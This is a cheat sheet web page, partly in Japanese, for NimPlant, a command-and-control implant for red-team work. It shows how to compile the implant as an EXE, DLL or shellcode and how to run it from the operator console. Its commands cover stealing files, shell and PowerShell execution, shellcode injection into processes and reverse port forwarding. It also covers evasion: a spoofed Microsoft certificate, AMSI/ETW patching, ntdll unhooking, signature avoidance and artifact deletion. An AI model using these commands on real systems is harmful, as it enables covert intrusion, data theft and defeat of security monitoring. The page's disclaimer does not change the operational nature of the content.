コンテンツにスキップ
1337skills 1337skills - チートシート

NimPlant

NimPlantはNimで書かれた軽量クロスプラットフォームコマンド&コントロール(C2)インプラントです。HTTP/HTTPS通信、設定可能なスリープ間隔、ファイル操作、シェルコード実行機能を備えています。

免責事項: このツールは認可されたセキュリティテストおよびレッドチーム活動のみを目的としています。所有していない、またはテストの明示的な許可がないシステムに対する不正使用は違法かつ非倫理的です。攻撃的セキュリティ操作を実施する前に、必ず書面による認可を取得してください。

インストール

Server Setup

# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant

# Install Python dependencies for the server
pip install -r server/requirements.txt

# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh

# Install Nim dependencies
nimble install -y winim nimcrypto zippy

Compile the Implant

# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe

# Compile as DLL
python3 NimPlant.py compile -o dll

# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode

# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile

Server Operations

Starting the Server

# Start the NimPlant C2 server
python3 NimPlant.py server

# Server starts listening on configured port
# Web UI available at https://server-ip:port/

Managing Implants

# In the NimPlant server console:

# List active implants
nimplant> list

# Interact with a specific implant
nimplant> interact <implant-id>

# View implant details
nimplant> info

# Kill an implant
nimplant> kill

Commands

Reconnaissance

# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env

# List running processes
nimplant> ps

# Get current working directory
nimplant> pwd

# List directory contents
nimplant> ls C:\Users

File Operations

# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt

# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt

# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir

# Remove a file
nimplant> rm C:\Windows\Temp\file.exe

# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt

# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt

Execution

# Execute a shell command
nimplant> shell net user

# Execute a command via cmd.exe
nimplant> cmd /c dir C:\

# Run PowerShell command
nimplant> powershell Get-Process

# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2

# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin

ネットワーク Operations

# List network connections
nimplant> netstat

# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80

# Stop reverse port forward
nimplant> rportfwd stop 8080

Sleep and Communication

# Change sleep interval (seconds)
nimplant> sleep 30

# Change sleep jitter (percentage)
nimplant> jitter 40

# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40

HTTPS Communication

# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
  -days 365 -nodes -subj "/CN=cdn.microsoft.com"

# Place certificates in the server directory
cp server.key server/
cp server.crt server/

OPSEC Considerations

# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)

# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection

Evasion Configuration

# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true

Logging

# Server logs all interactions
# Logs stored in: server/logs/

# View engagement log
cat server/logs/nimplant.log

# Each implant session has its own log
ls server/logs/sessions/

Cleanup

# Terminate all active implants
nimplant> killall

# Individual implant cleanup
nimplant> interact <id>
nimplant> kill

# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill